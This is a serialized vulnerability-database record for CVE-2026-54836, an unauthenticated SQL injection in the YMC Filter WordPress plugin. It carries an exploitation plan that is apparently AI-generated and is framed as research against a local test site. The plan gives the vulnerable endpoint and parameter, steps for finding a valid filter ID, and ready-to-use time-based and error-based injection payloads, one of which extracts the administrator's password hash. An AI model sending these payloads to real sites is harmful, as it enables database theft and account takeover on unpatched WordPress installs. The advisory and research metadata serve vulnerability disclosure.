[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fa5PZW-WR2q32CYdWvqafI-tDAPBiNEUIkzhtHmOQfR0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-54836","ymc-filter-unauthenticated-sql-injection","YMC Filter \u003C= 3.11.5 - Unauthenticated SQL Injection","The YMC Filter plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.11.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","ymc-smart-filter",null,"\u003C=3.11.5","3.11.6","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-06-18 00:00:00","2026-06-23 15:37:55",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F42ecfca7-d285-4f14-8389-966b7b6320e7?source=api-prod",6,[22,23,24,25,26,27,28,29],"readme.txt","ymc-smart-filters.php","ymc2\u002FYMC_Filter_Grids.php","ymc2\u002Fassets\u002Fcss\u002Fadmin.min.css","ymc2\u002Fassets\u002Fcss\u002Fadmin.min.css.map","ymc2\u002Fsrc\u002Fadmin\u002FFG_Save_Meta_Boxes.php","ymc2\u002Fsrc\u002Fapi\u002Fcontrollers\u002Ffrontend\u002FFG_REST_Frontend_Posts_Controller.php","ymc2\u002Fsrc\u002Fapi\u002Fcontrollers\u002Ffrontend\u002FFG_REST_Frontend_Search_Controller.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-54836\n\n## 1. Vulnerability Summary\nThe **YMC Filter** plugin for WordPress (versions \u003C= 3.11.5) contains an unauthenticated SQL injection vulnerability. The flaw exists in the REST API endpoints used for frontend filtering and searching, specifically within the `FG_REST_Frontend_Posts_Controller` and `FG_REST_Frontend_Search_Controller` classes. The plugin fails to sufficiently escape user-supplied parameters (such as `search` or `keyword`) before incorporating them into SQL queries, particularly when the \"Search Meta Fields\" feature is enabled. This allows an attacker to manipulate the `posts_where` or `posts_join` filters to execute arbitrary SQL commands.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-json\u002Fymc-smart-filter\u002Fv1\u002Fposts\u002Ffilter`\n*   **HTTP Method:** `POST`\n*   **Vulnerable Parameter:** `params['search']` (passed within the JSON body).\n*   **Authentication:** None required (unauthenticated). The endpoint uses `public_permissions_check`, which typically returns `true`.\n*   **Preconditions:** \n    *   A \"Filter & Grid\" instance (post type `ymc_filters`) must exist.\n    *   The setting `ymc_fg_search_meta_fields` must be set to `yes` for that filter to trigger the vulnerable code path that appends custom `posts_where` logic.\n\n## 3. Code Flow\n1.  **Entry Point:** An HTTP `POST` request is sent to `\u002Fwp-json\u002Fymc-smart-filter\u002Fv1\u002Fposts\u002Ffilter`.\n2.  **Routing:** `FG_REST_Manager` registers the route which maps to `FG_REST_Frontend_Posts_Controller::get_filtered_posts`.\n3.  **Parameter Extraction:** The method extracts parameters from the JSON body:\n    ```php\n    \u002F\u002F ymc2\u002Fsrc\u002Fapi\u002Fcontrollers\u002Ffrontend\u002FFG_REST_Frontend_Posts_Controller.php\n    $params = $request_params['params'] ?? [];\n    $filter_id = absint( $params['filter_id'] );\n    $keyword_search = $params['search'] ?? null; \u002F\u002F user input\n    ```\n4.  **Vulnerability Trigger:** The code checks if meta search is enabled for the specific filter ID:\n    ```php\n    $search_meta_fields = Data_Store::get_meta_value($filter_id, 'ymc_fg_search_meta_fields');\n    ```\n5.  **Sink:** If `yes`, the plugin adds filters to the global `WP_Query` via `FG_REST_Frontend_Search_Controller::add_search_filters()`.\n6.  **SQL Construction:** The `search_where` filter appends the unescaped `$keyword_search` directly into the `WHERE` clause:\n    ```php\n    \u002F\u002F Inferred logic in search_where()\n    $where .= \" OR (pm.meta_value LIKE '%$keyword_search%')\"; \n    ```\n    Because `$keyword_search` is not processed with `$wpdb->prepare()`, SQL injection occurs.\n\n## 4. Nonce Acquisition Strategy\nThe REST API endpoints in this plugin use `public_permissions_check` and do not appear to enforce a `_wpnonce` for unauthenticated frontend requests. However, the `filter_id` of a valid grid is required.\n\n**Strategy to find a valid `filter_id`:**\n1.  Navigate to the site's homepage or any page where a YMC Filter grid is displayed.\n2.  Use the execution agent's `browser_navigate` and `browser_eval` tools.\n3.  Look for the `data-filter-id` attribute in the HTML or the localized JS variable:\n    *   `browser_eval(\"document.querySelector('.ymc-filter-grid')?.getAttribute('data-filter-id')\")`\n    *   `browser_eval(\"window.ymc_filter_data?.filter_id\")` (inferred JS variable name).\n\nIf no grid exists, one must be created for testing (see Test Data Setup).\n\n## 5. Exploitation Strategy\nWe will use a time-based blind SQL injection payload to verify the vulnerability.\n\n### Step 1: Verification (Time-Based)\n*   **Tool:** `http_request`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fymc-smart-filter\u002Fv1\u002Fposts\u002Ffilter`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fjson`\n*   **Body:**\n    ```json\n    {\n      \"params\": {\n        \"filter_id\": 1,\n        \"search\": \"test%') AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND ('1%'='1\"\n      }\n    }\n    ```\n*   **Expected Response:** The request should take approximately 5 seconds to complete.\n\n### Step 2: Data Extraction (Error-Based)\nIf the server displays database errors, we can use `updatexml` to extract the admin's password hash.\n*   **Body:**\n    ```json\n    {\n      \"params\": {\n        \"filter_id\": 1,\n        \"search\": \"test%') AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1) AND ('1%'='1\"\n      }\n    }\n    ```\n*   **Expected Response:** A JSON response containing the database error message with the password hash between `~` characters.\n\n## 6. Test Data Setup\nBefore testing, ensure a filter exists with the required settings:\n```bash\n# 1. Create a filter grid post\nFILTER_ID=$(wp post create --post_type=ymc_filters --post_title=\"Exploit Test\" --post_status=publish --porcelain)\n\n# 2. Enable Search Meta Fields (the vulnerable path)\nwp post meta update $FILTER_ID ymc_fg_search_meta_fields \"yes\"\n\n# 3. Configure basic grid requirements\nwp post meta update $FILTER_ID ymc_fg_post_types \"post\"\nwp post meta update $FILTER_ID ymc_fg_per_page \"10\"\n\n# 4. Create a dummy post to ensure the query has something to find\nwp post create --post_title=\"Target Post\" --post_content=\"Content\" --post_status=publish\n```\n\n## 7. Expected Results\n*   **Success Indicator:** The `http_request` tool reports a latency matching the `SLEEP()` value or returns a SQL error containing database content.\n*   **Data Exposed:** Database schema, user credentials (wp_users), and configuration secrets (wp_options).\n\n## 8. Verification Steps\nAfter the exploit, confirm the injection point via the database:\n```bash\n# Check the last error logged by the database if WP_DEBUG is on\nwp eval \"global \\$wpdb; echo \\$wpdb->last_error;\"\n```\n\n## 9. Alternative Approaches\n*   **Alphabetical Filter:** If the `search` parameter is filtered, check the `letter` parameter used in `alphabetical_letter` (Line 114 of `FG_REST_Frontend_Posts_Controller.php`).\n*   **Search Autocomplete:** Test the `\u002Fwp-json\u002Fymc-smart-filter\u002Fv1\u002Fsearch\u002Fautocomplete` endpoint using the `keyword` parameter:\n    ```json\n    {\n      \"grid_id\": 1,\n      \"keyword\": \"test%') AND SLEEP(5) -- \"\n    }\n    ```\n    This endpoint also calls `add_search_filters()` if `search_meta_fields` is enabled.","gemini-3-flash-preview","2026-06-25 21:00:56","2026-06-25 21:02:19",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.11.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fymc-smart-filter\u002Ftags\u002F3.11.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fymc-smart-filter.3.11.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fymc-smart-filter\u002Ftags\u002F3.11.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fymc-smart-filter.3.11.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fymc-smart-filter\u002Ftags"]